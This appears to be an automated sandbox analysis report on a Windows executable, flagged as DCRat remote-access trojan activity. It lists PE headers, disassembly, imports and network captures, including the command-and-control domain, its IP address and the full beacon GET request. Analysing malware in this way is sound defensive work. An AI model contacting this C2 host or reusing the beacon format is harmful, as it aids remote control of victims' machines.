                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                              File Icon

                              Icon Hash:1515d4d4442f2d2d

                              Static PE Info

                              General

                              Entrypoint:0x41ec40
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                              Entrypoint Preview

                              Instruction
                              call 00007F43207EA049h
                              jmp 00007F43207E9A5Dh
                              cmp ecx, dword ptr [0043E668h]
                              jne 00007F43207E9BD5h
                              ret
                              jmp 00007F43207EA1CEh
                              int3
                              int3
                              int3
                              int3
                              int3
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007F43207DC967h
                              mov dword ptr [esi], 00435580h
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 00435588h
                              mov dword ptr [ecx], 00435580h
                              ret
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              lea eax, dword ptr [ecx+04h]
                              mov dword ptr [ecx], 00435568h
                              push eax
                              call 00007F43207ECD6Dh
                              pop ecx
                              ret
                              push ebp
                              mov ebp, esp
                              sub esp, 0Ch
                              lea ecx, dword ptr [ebp-0Ch]
                              call 00007F43207DC8FEh
                              push 0043B704h
                              lea eax, dword ptr [ebp-0Ch]
                              push eax
                              call 00007F43207EC482h
                              int3
                              push ebp
                              mov ebp, esp
                              sub esp, 0Ch
                              lea ecx, dword ptr [ebp-0Ch]
                              call 00007F43207E9B74h
                              push 0043B91Ch
                              lea eax, dword ptr [ebp-0Ch]
                              push eax
                              call 00007F43207EC465h
                              int3
                              jmp 00007F43207EE4B3h
                              jmp dword ptr [00433260h]
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push 00421EB0h
                              push dword ptr fs:[00000000h]

                              Rich Headers

                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [C++] VS2015 UPD3.1 build 24215
                              • [EXP] VS2015 UPD3.1 build 24215
                              • [RES] VS2015 UPD3 build 24213
                              • [LNK] VS2015 UPD3.1 build 24215

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xdfd0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x2268.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x630000xdfd00xe000f6c0f34fae6331b50a7ad2efc4bfefdbFalse0.6370326450892857data6.6367506404157535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x710000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              PNG0x636500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                              PNG0x641980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                              RT_ICON0x657480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                              RT_ICON0x65cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                              RT_ICON0x665580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                              RT_ICON0x674000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                              RT_ICON0x678680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                              RT_ICON0x689100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                              RT_ICON0x6aeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                              RT_DIALOG0x6f5880x286dataEnglishUnited States0.5092879256965944
                              RT_DIALOG0x6f3580x13adataEnglishUnited States0.60828025477707
                              RT_DIALOG0x6f4980xecdataEnglishUnited States0.6991525423728814
                              RT_DIALOG0x6f2280x12edataEnglishUnited States0.5927152317880795
                              RT_DIALOG0x6eef00x338dataEnglishUnited States0.45145631067961167
                              RT_DIALOG0x6ec980x252dataEnglishUnited States0.5757575757575758
                              RT_STRING0x6ff680x1e2dataEnglishUnited States0.3900414937759336
                              RT_STRING0x701500x1ccdataEnglishUnited States0.4282608695652174
                              RT_STRING0x703200x1b8dataEnglishUnited States0.45681818181818185
                              RT_STRING0x704d80x146dataEnglishUnited States0.5153374233128835
                              RT_STRING0x706200x446dataEnglishUnited States0.340036563071298
                              RT_STRING0x70a680x166dataEnglishUnited States0.49162011173184356
                              RT_STRING0x70bd00x152dataEnglishUnited States0.5059171597633136
                              RT_STRING0x70d280x10adataEnglishUnited States0.49624060150375937
                              RT_STRING0x70e380xbcdataEnglishUnited States0.6329787234042553
                              RT_STRING0x70ef80xd6dataEnglishUnited States0.5747663551401869
                              RT_GROUP_ICON0x6ec300x68dataEnglishUnited States0.7019230769230769
                              RT_MANIFEST0x6f8100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                              Imports

                              DLLImport
                              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-31T09:22:11.861438+0200TCP2034194ET MALWARE DCRAT Activity (GET)14973480192.168.2.4141.8.194.149

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 31, 2024 09:22:11.156493902 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.161345005 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.161905050 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.162435055 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.167217970 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861377954 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861390114 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861401081 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861423016 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861432076 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861438036 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.861443043 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861468077 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861483097 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861500025 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861526012 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.861538887 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.861939907 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.866261005 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.866308928 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.866318941 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.866492987 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.976166964 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976176977 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976250887 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976262093 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976273060 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976299047 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.976478100 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976494074 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976504087 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.976505041 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976520061 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976530075 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.976560116 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.977144003 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977164984 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977174997 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977220058 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977231026 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977936029 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977946043 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977957964 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977972984 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977988005 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.977998018 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.978849888 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.978883028 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.979779959 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.980010033 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.981156111 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.981165886 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.981178045 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.981189966 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:11.981211901 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:11.981304884 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.090919018 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.090929031 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091114044 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.091155052 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091185093 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091193914 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091204882 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091216087 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091273069 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091283083 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091294050 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091310024 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091320992 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091337919 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.091368914 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.091546059 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.098903894 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.103756905 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.312961102 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.312973022 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.312988043 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.312999010 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313009024 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313013077 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313019037 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313030005 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313040018 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313051939 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313060045 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313067913 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313072920 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313204050 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313251972 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313271046 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313282013 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313298941 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313314915 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313369989 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313381910 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313390970 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313391924 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313415051 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313436985 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313488960 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313508034 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313518047 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313528061 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313539982 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313543081 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313551903 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.313568115 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.313601017 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.314023972 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314065933 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314075947 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314115047 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.314137936 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314152956 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314162970 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314172983 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314188004 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.314205885 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.314249992 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314260006 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314270020 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314280033 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314290047 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.314296961 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314304113 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.314310074 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.314347982 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.315037966 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315049887 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315061092 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315088034 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.315114975 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315124989 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315135956 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315154076 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315159082 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.315165043 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315181971 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315192938 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315196991 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.315203905 CEST8049734141.8.194.149192.168.2.4
                              Aug 31, 2024 09:22:12.315222979 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.315238953 CEST4973480192.168.2.4141.8.194.149
                              Aug 31, 2024 09:22:12.324552059 CEST4973480192.168.2.4141.8.194.149

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 31, 2024 09:22:11.136359930 CEST5977153192.168.2.41.1.1.1
                              Aug 31, 2024 09:22:11.146543980 CEST53597711.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 31, 2024 09:22:11.136359930 CEST192.168.2.41.1.1.10xec1bStandard query (0)a1023624.xsph.ruA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 31, 2024 09:22:11.146543980 CEST1.1.1.1192.168.2.40xec1bNo error (0)a1023624.xsph.ru141.8.194.149A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • a1023624.xsph.ru

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449734141.8.194.149807900C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 09:22:11.162435055 CEST477OUTGET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1
                              Accept: */*
                              Content-Type: text/css
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                              Host: a1023624.xsph.ru
                              Connection: Keep-Alive
                              Aug 31, 2024 09:22:11.861377954 CEST1236INHTTP/1.1 403 Forbidden
                              Server: openresty
                              Date: Sat, 31 Aug 2024 07:22:11 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Vary: Accept-Encoding
                              Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                              Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                              Aug 31, 2024 09:22:11.861390114 CEST1236INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                              Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-i
